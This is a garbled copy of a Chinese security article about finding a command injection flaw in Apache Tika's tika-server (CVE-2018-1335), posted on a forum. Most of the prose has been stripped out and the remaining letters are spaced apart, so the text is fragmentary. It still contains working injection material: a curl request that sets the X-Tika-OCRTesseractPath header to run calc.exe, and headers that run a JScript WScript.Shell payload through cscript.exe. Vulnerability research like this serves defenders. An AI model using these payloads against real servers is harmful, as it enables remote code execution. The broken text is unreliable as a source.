[14204] 2019-06-08_ApacheTika命令注入漏洞挖掘

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2019-06-08_ApacheTika命令注入漏洞挖掘 A p a c h e   T i k a   F r e e B u f   2 0 1 9 - 0 6 - 0 8 A p a c h e   t i k a C V E h t t p s : / / n v d . n i s t . g o v / v u l n / d e t a i l / C V E - 2 0 1 8 - 1 3 3 5 A p a c h e   T i k a A p a c h e   T i k a J a v a A p a c h e   T i k a 使 使 C s c r i p t . e x e A p a c h e   T i k a A p a c h e   T i k a P P T X L S P D F 使 T i k a h t t p s : / / t i k a . a p a c h e . o r g / A p a c h e   T i k a J a v a R E S T   A P I t i k a - s e r v e r R E S T   A P I h t t p s : / / w i k i . a p a c h e . o r g / t i k a / T i k a J A X R S h t t p s : / / a r c h i v e . a p a c h e . o r g / d i s t / t i k a / t i k a - s e r v e r - 1 . 1 7 . j a r B r e a k i n g   D o w n   T h e   C V E i s s u e T i k a   1 . 1 8 t i k a - s e r v e r t i k a - s e r v e r t i k a - s e r v e r 1 . 1 . 1 8 2 . 1 . 1 7 3 . 4 . h e a d e r s 5 . t i k a - s e r v e r T i k a t i k a - s e r v e r J a v a G r e p p i n g t i k a - s e r v e r H T T P 0 x 0 1 t i k a - s e r v e r   1 . 1 7 1 . 1 8 A L L O W A B L E H E A D E R C H A R S , p r o c e s s H e a d e r C o n f i g 1 . 1 8 使 使 H T T P
H T T P h e a d e r X - T i k a - O C R s o m e p r o p e r t y s o m e v a l u e s o m e p r o p e r t y s e t S o m e p r o p e r t y ( ) s o m e v a l u e 使 H T T P p r o c e s s H e a d e r C o n f i g 使 p r o c e s s H e a d e r C o n f i g T e s s e r a c t O C R C o n f i g 使 T e s s e r a c t O C R C o n f i g t i k a - p a r s e r s / s r c / m a i n / j a v a / o r g / a p a c h e / t i k a / p a r s e r / o c r / T e s s e r a c t O C R P a r s e r . j a v a T e s s e r a c t O C R P a r s e r . j a v a d o O C R T e s s e r a c t O C R C o n f i g P r o c e s s B u i l d e r , H T T P X - T i k a - O C R T e s s e r a c t P a t h c m d c o n f i g . g e t T e s s e r a c t P a t h ( ) g e t T e s s e r a c t P r o g ( ) t e s s e r a c t . e x e W i n d o w s 使 t i k a - s e r v e r O C R d o c x d o O C R P U T X - T i k a - O C R T e s s e r a c t P a t h H T T P 0 x 0 2   c u r l   - T   t e s t . t i f f   h t t p : / / l o c a l h o s t : 9 9 9 8 / m e t a   - - h e a d e r   " X - T i k a - O C R T e s s e r a c t P a t h :   " c a l c . e x e " "
J a v a   P r o c e s s B u i l d e r J a v a r u n t i m e . e x e c c m d . e x e / b i n / s h s h e l l < > | ` P r o c e s s B u i l d e r X - T i k a - O C R T e s s e r a c t P a t h :   c m d . e x e   / c   s o m e   a r g s c m d c o n f i g . g e t * ( ) c m d . e x e / c c o n f i g . g e t L a n g u a g e ( ) | |   s o m e c o m m a n d   | | c o n f i g . g e t P a g e S e g M o d e ( ) s o m e c o m m a n d d o O C R c o n f i g . g e t T e s s e r a c t P a t h ( ) c m d . e x e c m d . e x e 退 d o O C R 0 x 0 3   d o O C R 使 P r o c e s s   M o n i t o r   t i k a - s e r v e r 使 i n j e c t 3 1 2 T i k a 2 W i n d o w s t i k a - s e r v e r 使 . t m p C s c r i p t . e x e C s c r i p t C s c r i p t 使 " / / E : e n g i n e " 使 J s c r i p t V B S H T T P i m a g e J s c r i p t V B S i m a g e / j p 2 使 T i k a O C R J s c r i p t c o m m a n d / j s c r i p t / v b s " c a l c . e x e " t e s s e r a c t . e x e   C : U s e r s T e s t A p p D a t a L o c a l T e m p a p a c h e - t i k a - 3 2 9 9 1 2 4 4 9 3 9 4 2 9 8 5 2 9 9 . t m p   C : U s e r s T e s t A p p D a t a L o c a l T e m p a p a c h e - t i k a - 7 3 1 7 8 6 0 6 4 6 0 8 2 3 3 8 9 5 3 . t m p   - l   e n g   - p s m   " c s c r i p t . e x e " t e s s e r a c t . e x e   C : U s e r s T e s t A p p D a t a L o c a l T e m p a p a c h e - t i k a - 3 2 9 9 1 2 4 4 9 3 9 4 2 9 8 5 2 9 9 . t m p   C : U s e r s T e s t A p p D a t a L o c a l T e m p a p a c h e - t i k a - 7 3 1 7 8 6 0 6 4 6 0 8 2 3 3 8 9 5 3 . t m p   - l   / / E : J s c r i p t   - p s m   1   t x t   - c   p r e s e r v e _ i n t e r w o r d _ s p a c e s = 0 X - T i k a - O C R T e s s e r a c t P a t h :   " c s c r i p t . e x e " X - T i k a - O C R L a n g u a g e :   / / E : J s c r i p t v a r   o S h e l l   =   W S c r i p t . C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) ; v a r   o E x e c   =   o S h e l l . E x e c ( ' c m d   / c   c a l c . e x e ' ) ;
A p a c h e T i k a 1 . 2 0 使 P o C h t t p s : / / g i t h u b . c o m / R h i n o S e c u r i t y L a b s / C V E s / t r e e / m a s t e r / C V E - 2 0 1 8 - 1 3 3 5 * r h i n o s e c u r i t y l a b s F B F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则